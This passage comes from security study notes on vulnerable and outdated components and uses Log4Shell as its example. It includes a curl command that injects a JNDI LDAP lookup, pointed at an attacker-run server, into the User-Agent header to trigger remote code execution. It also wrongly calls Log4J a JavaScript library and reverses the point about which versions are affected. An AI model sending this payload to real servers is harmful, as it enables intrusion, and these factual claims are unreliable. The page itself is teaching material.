Vulnerable and Outdated Components

Highlights the dangers of using software libraries, frameworks, or components that contain known vulnerabilities or are outdated. When applications rely on these components, they inherit their security weaknesses which could happen even server-side or client-side.

Here is a typical example of this vulnerability as follows:

The Log4Shell vulnerability is one of the most known examples of this. Is a vulnerability from the JavaScript library Log4J which allowed RCE and information disclosure

#For example, a server is running using this component in its code
http://$url:8888/
#If we make a JNDI petition to the web server and redirect it to a JNDI server of our own, the connection will be caught and the web server will process the content of the JNDI server
curl -A \${jndi:ldap://192.168.2.5:1234/a} http://TCMserver:8888/
#This can be leveraged by submitting exploits to the JNDI server which will cause information disclosure and even RCE on the target server

This has been fixed in the latest versions of Log4J, but the vulnerability will remain in every application using a non-outdated version of the library

PreviousSecurity Misconfiguration NextIdentification and Authentication Failures

Last updated 4 months ago